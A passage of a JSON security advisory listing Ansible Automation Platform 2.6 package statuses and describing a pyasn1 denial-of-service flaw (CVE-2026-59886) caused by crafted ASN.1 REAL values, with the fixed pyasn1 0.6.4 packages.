"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pyasn1: python-pyasn1: pyasn1: Denial of Service via crafted ASN.1 OBJECT IDENTIFIER"
},
{
"cve": "CVE-2026-59886",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-07-14T17:01:19.689422+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500041"
}
],
"notes": [
{
"category": "description",
"text": "A remote attacker can exploit this by providing specially crafted BER/CER/DER-encoded ASN.1 data with a large exponent in the REAL value. When the application subsequently prints, logs, compares, or performs arithmetic on the decoded value, this can cause excessive CPU and memory consumption, leading to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pyasn1: pyasn1: Denial of Service via crafted ASN.1 REAL values",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw in pyasn1, rated as Important, could lead to a denial of service in Red Hat products that process untrusted ASN.1 data. A remote attacker could send a specially crafted BER, CER, or DER encoded REAL value with a large exponent, causing applications to consume excessive resources during decoding operations such as printing, logging, or arithmetic, thereby rendering the service unavailable.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
